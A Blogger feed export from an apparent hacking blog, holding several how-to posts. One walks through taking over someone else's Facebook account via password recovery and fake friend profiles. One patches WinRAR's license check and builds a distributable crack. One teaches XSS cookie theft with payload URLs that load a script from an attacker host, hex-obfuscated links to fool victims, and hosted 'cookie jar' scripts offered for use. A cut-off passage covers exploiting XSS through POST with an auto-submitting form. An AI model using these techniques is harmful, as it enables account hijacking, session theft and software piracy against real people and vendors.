tag:blogger.com,1999:blog-84508976270207938992024-03-28T13:32:30.243-07:00HacksVarun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.comBlogger55125tag:blogger.com,1999:blog-8450897627020793899.post-19946043065677907362013-06-13T11:17:00.000-07:002013-06-13T11:17:26.168-07:00Hack Facebook Passwords by adding people into friend list<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
It isn’t entirely unusual that Facebook users receive friend requests from people they do not know. Often, those friend requests are blindly accepted in an effort to grow the friendship base. It seems that especially people with Facebook accounts that are primarily used for marketing purposes are more likely to accept friend requests from people they do not know than the typical Facebook user does.</div>
<br style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" />
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px; text-align: center;">
<b>Such accounts could be hacked easily, and there is no ingenious hacking talent required to do so: You simply need to walk through Facebook’s passwork recovery process with two other Facebook friends of a targeted account.</b></div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You can easily gain access to a your friends Facebook account through a collusion approach. You have to use Facebook’s password recovery feature, which is accessible through the </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">“Forgot your password?” </b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">link on the Facebook login page.</span><br style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Once identified the Friend, Facebook suggested to recover the password via the existing email address. However, you can bypass this hurdle by clicking </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">the “No longer have access to these?” link. </b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">In that case, Facebook asks for a new email address. In the following step, Facebook presents the security question tied to the account. However, you can also to bypass the question by </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">typing wrong answers three times in a row.</b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> After that, Facebook provides a rather surprising way to get your account back – </span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">via the support of three friends.</b><div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4rA0RB6FMzUApp3maQ1xQR1ezlczHiePgeHnPWxBAGCPIa6Yw2J3FWqESNk8PkeeOUwG4x6FPIFsZ-xUGoXk26X1Kk120lwoiAQOoeruwISHapvj8riJW5qDzkARj5F-gunfbp_-va4N/s1600/How+to+Hack+Facebook+Password+Facebook+Password+Hacker+How+to+Hack+Facebook+Password+Facebook+Password+Hacker.jpg" style="color: black; outline: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5603215484286363810" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4rA0RB6FMzUApp3maQ1xQR1ezlczHiePgeHnPWxBAGCPIa6Yw2J3FWqESNk8PkeeOUwG4x6FPIFsZ-xUGoXk26X1Kk120lwoiAQOoeruwISHapvj8riJW5qDzkARj5F-gunfbp_-va4N/s400/How+to+Hack+Facebook+Password+Facebook+Password+Hacker+How+to+Hack+Facebook+Password+Facebook+Password+Hacker.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 329px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a></b>1. First, you select three friends “you trust”. These three friends then receive a code, which is required to change the account password.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
2. Select yourself and immediately received a code from Facebook. With those three codes, you can easily change the password for the targeted account.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
3. The problem clearly is that three friends you do not really know and cannot trust could potentially gain access to the victim Facebook account – through the standard password recovery feature.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
4. To bypass problem mentioned in step 3 <b><a href="http://hackguide4u.blogspot.com/search/label/Social%20Engineering" style="color: black; outline: none;">SOCIAL ENGINEERING</a>. </b>Create your own 2 more fake profiles and add the victim as a friend on facebook. Now get all the 3 codes and you are done.<br /><br /><b>NOTE: </b>The targeted account will be locked for 24 hours after this password change and the user’s old email address receives a notification of the password change as well as the names of the three friends who were given the codes. However, if these are friends with fake names, it doesn’t quite matter that you now know their names.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now if a Facebook user could in fact be in a situation when a Facebook account is not checked within a 24-hour period, particularly since we enjoy to flaunt our activities through Facebook status messages. And if the account is checked frequently, the account depends on Facebook’s response time, which can easily stretch to a number of days.</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;"><br /></span></div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com82tag:blogger.com,1999:blog-8450897627020793899.post-35810309132345552432013-06-13T10:59:00.001-07:002013-06-13T11:00:40.667-07:00Steps to crack winrar password<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="font-family: Arial, Helvetica, sans-serif;">
The Tools</h2>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">To perform this hack you will be needing -</span><br />
<ol style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<li>Any De-assembler (I use Hackers Disassembler and Hview )</li>
<li>Resource Hacker</li>
<li>A patch Creator ( Use Universal Patch Creator or Code fusion)</li>
</ol>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You will be able to get them by </span><a href="http://rdhacker.blogspot.com/search/label/Google" rel="nofollow" style="color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; outline: none;">googling</a><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> or you can download my set of tools provided.</span><br />
<h2 style="font-family: Arial, Helvetica, sans-serif;">
How to Crack ?</h2>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You need to have a bit knowledge of assembly language,and in case you don’t have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image002.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now copy the WinRAR.exe file to desktop. Make a copy of it there.</span><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 1 – Hunting for Memory Address</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now load Hackers Disasembler and load the copy in it.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image003.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter…</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image004.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn’t checks for the condition.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image006.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">In the above code you can see this code -</span><br />
<pre style="font-size: 13px;">00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12
</pre>
<pre style="font-size: 13px;"></pre>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">This is the code responsible for validating you as a legal user </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image007.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now in the dialog box that opens,search for “please” and you will get the reference as -</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">ID-REMINDER, “Please purchase WinRAR license”</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image008.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Double click on it and you will reach the subsequent code.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image009.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">The code will be something like</span><br />
<pre style="font-size: 13px;">* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB
</pre>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.</span><br />
<em style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.</em><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 2 – Fixing and Patching</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now load the copy you disassembled in Hacker’s Disassembler in Hview.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image010.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and yoiu will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image011.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Type .444B71 in place of 00444B71</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image012.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">and search in the code.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image013.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes –</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image014.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have done it, save it by pressing F9.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image015.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Save the changes by pressing F9 and exit HVIEW by pressing F10.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Congrats…You have cracked WinRAR </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine </span><img alt=":P" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 3 – Spicing up the EXE</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image016.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Launch Resource Hacker, load the copyofwinrar.exe in it</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image017.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one </span><img alt=":P" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image018.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">and click on Compile Script button.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image019.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now save the file with any name on your desktop or any location what so ever.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image020.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now you have a fully patched WinRAR.exe file </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;"> ) you can either use it, or also can distribute it like a real cracker. If you want to learn that, move on to next step.</span><br />
<h3 style="font-family: Arial, Helvetica, sans-serif;">
Step 4 – Creating a working Patch (or giving Professional touch <img alt=":P" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif" /> )</h3>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">I will be using diablo2oo2′s Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Launch Patch Creator and click on add new project. Enter project Information and click on save.</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image021.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Click on Add – > Offset patch</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image022.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">After you have done that, double click on offset patch and then</span><br />
<ol style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<li>Give path of original winrar.exe</li>
<li>Give path of unmodified Winrar.exe (again)</li>
<li>Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)</li>
<li>Click on compare and it will show difference between both files</li>
<li>Click on save.</li>
</ol>
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image023.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL</span><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image024.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">Congrats you have created a patch of your own and have learned to crack WinRAR </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<img alt="" class="aligncenter size-full wp-image-2019" src="http://img.viralpatel.net/2010/02/image025.jpg" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" title="image001" /><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px;">You can crack other software in the same way…just practice, debug and disassemble and you will get the way </span><img alt=":)" class="wp-smiley" src="http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif" style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;" /><br />
<em style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">[PS: The above is the long way to do it, I will be telling you the shortest way to crack WinRAR in just 1 step, the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hand. <br />]</em><span style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;"><br /></span></div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com35tag:blogger.com,1999:blog-8450897627020793899.post-19538518163096987672012-11-27T21:08:00.001-08:002012-11-27T21:15:06.729-08:00How to prevent cross site scripting XSS attacks<div dir="ltr" style="text-align: left;" trbidi="on">
XSS Are Your Applications Vulnerable, here is an detialed guide to prevent cross site scripting attacks .<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4-RAGY7vsr82rF5GHiRPjcUIeQDn9m2zO3BHKLqTXQ4rhj9SlJ4B82FtwFEbpRT9ZkEi0R24Yp20BD-sNmK34r0A_RggfcB4-8tGfU5SrsaVAVdy1Nt5L9eSy2h14MQOlTb0LNJza1oM/s1600/xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4-RAGY7vsr82rF5GHiRPjcUIeQDn9m2zO3BHKLqTXQ4rhj9SlJ4B82FtwFEbpRT9ZkEi0R24Yp20BD-sNmK34r0A_RggfcB4-8tGfU5SrsaVAVdy1Nt5L9eSy2h14MQOlTb0LNJza1oM/s320/xss.PNG" width="320" /></a></div>
<a href="https://hotfile.com/dl/181350582/33dc6b8/XSS_Are_Your_Applications_Vulnerable.pdf.html" target="_blank">click here</a> to download</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com12tag:blogger.com,1999:blog-8450897627020793899.post-34984767357196142852012-11-27T20:45:00.000-08:002012-11-27T21:54:32.497-08:00cross site scripting XSS cookie stealing tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
well what is a xss attack well this is the art of runing scrips in ur victoms pc you can allmost run any script in ther broswer with the right knowlge the most ideas xss is used for stealing cookies <br />
the cookies are bits of infomation used by web servers / web sites to check who u are on on that site <br />
if your a gest it will set a cookie saying ur a gest when u login it will replace that cookie with ur cookie that you loged in with taht will have ur login id , sometimes if its a forum ur password encrpted in md5 hash<br />
and other stuff what the site can think of useing to make sure u are who u say u are <br />
like session id's what exspire after a time limit what the server sets like 10 mins or 60 mins <br />
well in the cookie it has sections that are named so when the server checks who you are<br />
it will read bits of data like the ID and the md5 hash if its a forum most <br />
of the time a forum will be useing the cookie prefix as defult like<br />
nukeevo_ID and so on but the forum admin can change that .<br />
<br />
<br />
Whats a user id? well this if you are the first to sign up to a forum ur id will be ONE because you <br />
will be the first in the sql table ... i will talk about the sql tables latter. the admin account is<br />
nearly allmost all the time ID 1 or 2 because of corse he wud of had to make the account first <br />
to config the forum now when looking for this type of attack the is ways looking for this type of attack<br />
first geting the hacker point of view of this is to run that script no matter what looking at every way<br />
he or she can find on myspace the was useing flash files to not steal cookies because myspace filter <br />
java script but insted rederecting to a fake login page the files for this can be found in downloads.<br />
that was useing .swf files but the newist one for myspace is useing .mov files this is useing quicktime files<br />
to get a url what wud be to your fake log in a good FREE server to host to run php files is <br />
www.php1h.com you wold upload your cookie stealing scripts on taht server so you can send the users cookie <br />
to that site and view it in the log.<br />
<br />
ok how you cud set it up wud be <br />
<br />
http://evilhacker.php1h.com/cookiestealer.php = this is the back bone it takes the cookie from the java script we run called XSS.js<br />
<br />
http://evilhacker.php1h.com/log.php = this is the log wher the cookie will be sent after the cookiestealer has sent it to the log <br />
<br />
www.evilhacker.php1h.com/xss.js = this is the java script that gives the cookie to the cookiestealer.php <br />
<br />
<br />
: finidng xss attacks :<br />
well the first way will be viewing the site and looking around for any input box's and then viewing the sorce of that site for the name of the input<br />
box we find a xss exspoit in when looking for a xss u need to make sure that <br />
u look at the url in the URLbar and u mite see stuff that look like <br />
www.site.com/blah.html or .php or .cfm or .jsp ..<br />
make sure it has the full url and if it has stuff after a ? mark add it at the end of the url like this by useing a &<br />
www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script) so if the input box was called milk for someresion i dono why but just for this tut lets say that.and that the script will just print the words Xss on screen.<br />
<br />
www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script> <br />
<br />
the is "> because it tells the input box to stop reading ther and then it runs the java script<br />
and if the input box was called cat it wud look like this<br />
<br />
www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script> <br />
<br />
so go round a site looking for any type of input box's some times i find if a site has<br />
send to a friend that email box some times works.<br />
<br />
after u found it like u get a pop up with the words Xss in it then u will view sorce and look for the words XSs in a input box the basic synax for how it will look like is <br />
<br />
<input type="hidden" name="milk" value="" /> <br />
you see and from ther you will make the url <br />
what i will talk about at the end so after finding that a xss and ur able 2 run it in ur broswer <br />
you wont to start runing the cookie grabing scripts in ur broswer they will look like this <br />
<br />
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script><br />
<br />
if u sent some one that link in a email or on msn it wud run in ther broswer<br />
to execute that java script to steal ther cookies from site.com so if you found a xss in msn.com<br />
you wold have the cookies from msn.com <br />
<br />
but you mite ask your self how do i swap my cookies ? well if you are useing firefox the is a add on u can install called cookie editer and <br />
then you can edit your cookies or useing IE im sure you can edit them in internet temp files or somethink but your best bet is FF(firefox)<br />
just remeber when u steal the cookies thay all wont be one long string thay shud be broken up in 2 names like UID,others....out ther but u will just have <br />
to work that out for your self<br />
<br />
sending the link to a victom can be hard work sometimes if some one sent you a link that looked like this :<br />
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script> i wudnt click it <br />
but :P if u encrpted some of the words in that url in to hex like this<br />
useing this table :<br />
[img]http://62.31.49.95/asciifull.gif[/img]<br />
you cud encrpt it to look sometink like this <br />
<br />
%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E = is the script encoded in hex <br />
wud u click that insted and to send it throght msn you mite wont to add a nother & at the end and fill it with shit<br />
like<br />
www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12<that wud just make it think it needs to include the link the full of it the is other ways like useing .gif images to run the script on the site but thats a nother story.<br />
<br />
well thats it for now hope you injoyed the read <br />
VOl :v60-hackers:<br />
<br />
:info:<br />
i have set up some cookie jars for the people to lazzy <br />
<br />
http://v60.php1h.com/cookiejar/xss.js<br />
http://v60.php1h.com/cookiejar/log.php</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com18tag:blogger.com,1999:blog-8450897627020793899.post-32337850206163541182012-11-27T20:41:00.001-08:002012-11-27T21:15:06.732-08:00A guide to advanced cross site scripting XSS<div dir="ltr" style="text-align: left;" trbidi="on">
• Introduction<br />
• POST Method<br />
• Expansion on POST: secure areas<br />
• Generalized client automation<br />
• Prevention<br />
<br />
<b>Introduction</b><br />
I recently read in an article the incorrect statement that cross site<br />
scripting (XSS) can not be exploited if the POST method is used<br />
instead of GET, which is completely false. The method used to exploit<br />
POST variables may also be modified to allow for more advanced<br />
timing attacks which could allow an attacker to gain access to areas<br />
that require the user log in to a password protected area. When<br />
coupled with social engineering this method becomes an extremely<br />
reliable tool for attackers to gain access to secured areas via account<br />
hijacking.<br />
In typical cross site scripting the target views a website which<br />
contains code inserted into the HTML which was not written by the<br />
website designer or administrator. This bypasses the document object<br />
model which was intended to protect domain specific cookies<br />
(sessions, settings, etc.). In most instances the target is sent a link to<br />
a website on the server which the target has a legitimate account and<br />
by viewing that website the attackers malicious code is executed<br />
(commonly javascript to send the user's cookie to a third party server,<br />
in effect stealing their session and their account). This was a quick<br />
overview of cross site scripting and a solid foundation is needed<br />
before proceeding, my recommended reading is iDefense's XSS article<br />
(google.com). The attack presented below in conjunction with<br />
iDefense's method of attack automation makes for a very powerful<br />
combination.<br />
NOTE (October 19 2003) – Sverre Huseby has brought to my attention<br />
that the generalized version attack is not unique, it was discovered<br />
first by Jim Fulton<br />
(http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan),<br />
without my knowledge.<br />
<br />
<b>Post Method</b><br />
Because POST variables are sent separate of the actual website URL a<br />
direct attack from the target clicking on the malicious link and<br />
directly accessing the server vulnerable to the XSS attack is not<br />
possible (as far as I know). This is opposed to a GET request where<br />
the variable arguments are stored in the URL, such as<br />
http://www.google.com/search?hl=en&q=xss where the variables hl<br />
and q are seen in the URL. The implications of variables being sent in<br />
this manner are not in the scope of this article, but the POST method<br />
sends variables in the HTTP request and is not integrated in the URL<br />
such as is the case with GET.<br />
To exploit a web page with a cross site scripting vulnerability via a<br />
GET variable a URL in the form of<br />
http://vulnerable.com/search?q=<script>alert(document.cookie)<br />
</script> is composed. This URL is then sent to the target, upon<br />
clicking the URL they are taken to vulnerable.com's handy search<br />
engine (not to mention the dual HTML rendering within their site<br />
functionality) and the target receives a javascript pop up with their<br />
session cookie.<br />
Creating exploits for POST requests are only trivially more difficult,<br />
an intermediary web page is needed which will hold code that will<br />
force the client web browser in to making the POST request to the<br />
vulnerable server. This is trivially done via a form (with method POST<br />
and action of the target script) and javascript code which will<br />
automatically submit the form on page load. See example code block<br />
below.<br />
<form method="POST" action="http://vulnerable.com/search"<br />
name="explForm"><br />
<input type=hidden name=q value="<script>alert<br />
(document.cookie)</script>"><br />
</form><br />
<script language="Javascript"><br />
setTimeout('explForm.submit()', 1);<br />
</script><br />
One millisecond after the page is loaded containing this code the form<br />
(completely invisible in the rendered HTML) is submitted. In this case<br />
you have a simple search for "<script>alert(document.cookie)<br />
</script>" done on vulnerable.com's search engine (and consequently<br />
a javascript alert appears because for the sake of this paper,<br />
vulnerable.com's search engine is vulnerable to a cross site scripting<br />
attack). The above code can be easily changed if the target script<br />
requires variables to be GET, change method="POST" to<br />
